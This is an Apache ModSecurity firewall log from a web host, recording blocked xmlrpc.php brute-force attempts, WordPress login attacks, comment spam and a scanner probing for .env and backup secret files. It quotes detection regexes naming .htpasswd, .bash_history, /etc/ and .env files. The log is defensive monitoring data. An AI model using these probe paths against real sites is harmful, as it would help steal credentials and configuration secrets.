[Tue May 26 19:31:11.613423 2026] [security2:error] [pid 58470:tid 58667] [client 91.245.236.124:47615] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnp7njVHRH3AGGvmb7vgAAAEM"]
[Tue May 26 19:31:11.613600 2026] [security2:error] [pid 58470:tid 58667] [client 91.245.236.124:47615] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnp7njVHRH3AGGvmb7vgAAAEM"]
[Tue May 26 19:31:12.392923 2026] [security2:error] [pid 58470:tid 58655] [client 91.245.236.124:58369] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnqLnjVHRH3AGGvmb73wAAADc"]
[Tue May 26 19:31:12.393026 2026] [security2:error] [pid 58470:tid 58655] [client 91.245.236.124:58369] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnqLnjVHRH3AGGvmb73wAAADc"]
[Tue May 26 19:31:12.578428 2026] [security2:error] [pid 58470:tid 58684] [client 185.231.154.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahWnqLnjVHRH3AGGvmb74wAAAFQ"], referer: http://bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 19:31:13.157393 2026] [security2:error] [pid 58470:tid 58708] [client 91.245.236.124:57677] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnqbnjVHRH3AGGvmb77gAAAGw"]
[Tue May 26 19:31:13.157493 2026] [security2:error] [pid 58470:tid 58708] [client 91.245.236.124:57677] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnqbnjVHRH3AGGvmb77gAAAGw"]
[Tue May 26 19:31:13.921721 2026] [security2:error] [pid 58470:tid 58718] [client 91.245.236.124:27193] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnqbnjVHRH3AGGvmb8CgAAAHY"]
[Tue May 26 19:31:13.921849 2026] [security2:error] [pid 58470:tid 58718] [client 91.245.236.124:27193] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnqbnjVHRH3AGGvmb8CgAAAHY"]
[Tue May 26 19:31:13.952943 2026] [security2:error] [pid 58470:tid 58597] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/.env"] [unique_id "ahWnqbnjVHRH3AGGvmb8DAAACH4"]
[Tue May 26 19:31:14.686810 2026] [security2:error] [pid 58470:tid 58662] [client 91.245.236.124:19775] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnqrnjVHRH3AGGvmb8IgAAAD4"]
[Tue May 26 19:31:14.686920 2026] [security2:error] [pid 58470:tid 58662] [client 91.245.236.124:19775] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnqrnjVHRH3AGGvmb8IgAAAD4"]
[Tue May 26 19:31:15.467803 2026] [security2:error] [pid 58470:tid 58645] [client 91.245.236.124:50427] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnq7njVHRH3AGGvmb8RAAAAC0"]
[Tue May 26 19:31:15.467914 2026] [security2:error] [pid 58470:tid 58645] [client 91.245.236.124:50427] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnq7njVHRH3AGGvmb8RAAAAC0"]
[Tue May 26 19:31:15.625858 2026] [security2:error] [pid 58470:tid 58712] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnq7njVHRH3AGGvmb8NwAAAHA"]
[Tue May 26 19:31:15.985832 2026] [security2:error] [pid 58470:tid 58655] [client 185.231.154.128:51141] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.231.154.128" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWnq7njVHRH3AGGvmb8UwAAADc"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 19:31:16.172544 2026] [security2:error] [pid 58470:tid 58655] [client 185.231.154.128:51141] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWnq7njVHRH3AGGvmb8UwAAADc"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 19:31:16.245349 2026] [security2:error] [pid 58470:tid 58699] [client 91.245.236.124:50049] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnrLnjVHRH3AGGvmb8VgAAAGM"]
[Tue May 26 19:31:16.245494 2026] [security2:error] [pid 58470:tid 58699] [client 91.245.236.124:50049] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnrLnjVHRH3AGGvmb8VgAAAGM"]
[Tue May 26 19:31:17.008709 2026] [security2:error] [pid 58470:tid 58682] [client 91.245.236.124:41909] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnrbnjVHRH3AGGvmb8ewAAAFI"]
[Tue May 26 19:31:17.008841 2026] [security2:error] [pid 58470:tid 58682] [client 91.245.236.124:41909] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnrbnjVHRH3AGGvmb8ewAAAFI"]
[Tue May 26 19:31:17.103820 2026] [security2:error] [pid 58470:tid 58630] [client 195.178.110.48:49866] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "startupmart.com.md-74.webhostbox.net"] [uri "/en"] [unique_id "ahWnrbnjVHRH3AGGvmb8fgAAAB4"]
[Tue May 26 19:31:17.264422 2026] [security2:error] [pid 58470:tid 58627] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnrLnjVHRH3AGGvmb8bgAAABs"]
[Tue May 26 19:31:17.388352 2026] [security2:error] [pid 58470:tid 58602] [client 14.172.145.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnrLnjVHRH3AGGvmb8cwAAAAI"]
[Tue May 26 19:31:17.436279 2026] [security2:error] [pid 58470:tid 58636] [client 202.28.194.139:33033] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "202.28.194.139" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWnrbnjVHRH3AGGvmb8hAAAACQ"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 19:31:17.436390 2026] [security2:error] [pid 58470:tid 58636] [client 202.28.194.139:33033] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWnrbnjVHRH3AGGvmb8hAAAACQ"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 19:31:17.769836 2026] [security2:error] [pid 58470:tid 58717] [client 91.245.236.124:19783] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnrbnjVHRH3AGGvmb8lgAAAHU"]
[Tue May 26 19:31:17.769926 2026] [security2:error] [pid 58470:tid 58717] [client 91.245.236.124:19783] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnrbnjVHRH3AGGvmb8lgAAAHU"]
[Tue May 26 19:31:18.529945 2026] [security2:error] [pid 58470:tid 58718] [client 91.245.236.124:51515] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnrrnjVHRH3AGGvmb8rAAAAHY"]
[Tue May 26 19:31:18.530058 2026] [security2:error] [pid 58470:tid 58718] [client 91.245.236.124:51515] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnrrnjVHRH3AGGvmb8rAAAAHY"]
[Tue May 26 19:31:18.605316 2026] [security2:error] [pid 58470:tid 58685] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnrrnjVHRH3AGGvmb8ogAAAFU"]
[Tue May 26 19:31:19.294173 2026] [security2:error] [pid 58470:tid 58705] [client 91.245.236.124:44059] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnr7njVHRH3AGGvmb8wgAAAGk"]
[Tue May 26 19:31:19.294291 2026] [security2:error] [pid 58470:tid 58705] [client 91.245.236.124:44059] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnr7njVHRH3AGGvmb8wgAAAGk"]
[Tue May 26 19:31:20.085188 2026] [security2:error] [pid 58470:tid 58651] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnr7njVHRH3AGGvmb8zgAAADM"]
[Tue May 26 19:31:20.311471 2026] [security2:error] [pid 58470:tid 58584] [remote 103.11.102.106:47962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnsLnjVHRH3AGGvmb82wAAE3E"]
[Tue May 26 19:31:20.652561 2026] [security2:error] [pid 58470:tid 58707] [client 91.245.236.124:10325] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnsLnjVHRH3AGGvmb81QAAAGs"]
[Tue May 26 19:31:20.652729 2026] [security2:error] [pid 58470:tid 58707] [client 91.245.236.124:10325] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnsLnjVHRH3AGGvmb81QAAAGs"]
[Tue May 26 19:31:21.329082 2026] [security2:error] [pid 58470:tid 58639] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWnsLnjVHRH3AGGvmb85AAAACc"]
[Tue May 26 19:31:21.415149 2026] [security2:error] [pid 58470:tid 58665] [client 91.245.236.124:15663] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnsbnjVHRH3AGGvmb9AAAAAEE"]
[Tue May 26 19:31:21.415277 2026] [security2:error] [pid 58470:tid 58665] [client 91.245.236.124:15663] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnsbnjVHRH3AGGvmb9AAAAAEE"]
[Tue May 26 19:31:22.180109 2026] [security2:error] [pid 58470:tid 58661] [client 91.245.236.124:15751] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnsrnjVHRH3AGGvmb9EwAAAD0"]
[Tue May 26 19:31:22.180219 2026] [security2:error] [pid 58470:tid 58661] [client 91.245.236.124:15751] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnsrnjVHRH3AGGvmb9EwAAAD0"]
[Tue May 26 19:31:22.412497 2026] [security2:error] [pid 58470:tid 58475] [remote 208.68.37.246:35180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.37.68.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnsrnjVHRH3AGGvmb9FQAAWwQ"]
[Tue May 26 19:31:22.419609 2026] [security2:error] [pid 58470:tid 58522] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/.env.backup"] [unique_id "ahWnsrnjVHRH3AGGvmb9GgAANjM"]
[Tue May 26 19:31:22.565450 2026] [security2:error] [pid 58470:tid 58476] [remote 123.30.233.13:45102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnsrnjVHRH3AGGvmb9GQAAewU"]
[Tue May 26 19:31:22.752040 2026] [security2:error] [pid 58470:tid 58479] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/.env.old"] [unique_id "ahWnsrnjVHRH3AGGvmb9IQAAAgg"]
[Tue May 26 19:31:22.934256 2026] [security2:error] [pid 58470:tid 58628] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnsrnjVHRH3AGGvmb9HQAAABw"]
[Tue May 26 19:31:22.948026 2026] [security2:error] [pid 58470:tid 58712] [client 91.245.236.124:63411] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnsrnjVHRH3AGGvmb9JgAAAHA"]
[Tue May 26 19:31:22.948153 2026] [security2:error] [pid 58470:tid 58712] [client 91.245.236.124:63411] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnsrnjVHRH3AGGvmb9JgAAAHA"]
[Tue May 26 19:31:23.097714 2026] [security2:error] [pid 58470:tid 58481] [remote 123.30.233.13:45102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWns7njVHRH3AGGvmb9JwAABQo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:31:23.197893 2026] [security2:error] [pid 58470:tid 58482] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/.env.bak"] [unique_id "ahWns7njVHRH3AGGvmb9MQAAYgs"]
[Tue May 26 19:31:23.512369 2026] [security2:error] [pid 58470:tid 58486] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/config/.env"] [unique_id "ahWns7njVHRH3AGGvmb9OgAADw8"]
[Tue May 26 19:31:23.727233 2026] [security2:error] [pid 58470:tid 58695] [client 91.245.236.124:39293] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWns7njVHRH3AGGvmb9RAAAAF8"]
[Tue May 26 19:31:23.727364 2026] [security2:error] [pid 58470:tid 58695] [client 91.245.236.124:39293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWns7njVHRH3AGGvmb9RAAAAF8"]
[Tue May 26 19:31:23.851429 2026] [security2:error] [pid 58470:tid 58490] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/app/.env"] [unique_id "ahWns7njVHRH3AGGvmb9SgAACxM"]
[Tue May 26 19:31:24.185384 2026] [security2:error] [pid 58470:tid 58493] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/src/.env"] [unique_id "ahWntLnjVHRH3AGGvmb9TwAAOxY"]
[Tue May 26 19:31:24.506494 2026] [security2:error] [pid 58470:tid 58684] [client 91.245.236.124:10705] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWntLnjVHRH3AGGvmb9XAAAAFQ"]
[Tue May 26 19:31:24.506613 2026] [security2:error] [pid 58470:tid 58684] [client 91.245.236.124:10705] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWntLnjVHRH3AGGvmb9XAAAAFQ"]
[Tue May 26 19:31:24.607239 2026] [security2:error] [pid 58470:tid 58492] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/backend/.env"] [unique_id "ahWntLnjVHRH3AGGvmb9XQAAahU"]
[Tue May 26 19:31:24.748161 2026] [security2:error] [pid 58470:tid 58652] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWntLnjVHRH3AGGvmb9WAAAADQ"]
[Tue May 26 19:31:24.940480 2026] [security2:error] [pid 58470:tid 58498] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/api/.env"] [unique_id "ahWntLnjVHRH3AGGvmb9ZAAAaxs"]
[Tue May 26 19:31:25.216849 2026] [security2:error] [pid 58470:tid 58496] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grcorp.in"] [uri "/config.php"] [unique_id "ahWntbnjVHRH3AGGvmb9aQAAWRk"]
[Tue May 26 19:31:25.274562 2026] [security2:error] [pid 58470:tid 58617] [client 91.245.236.124:44725] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWntbnjVHRH3AGGvmb9agAAABE"]
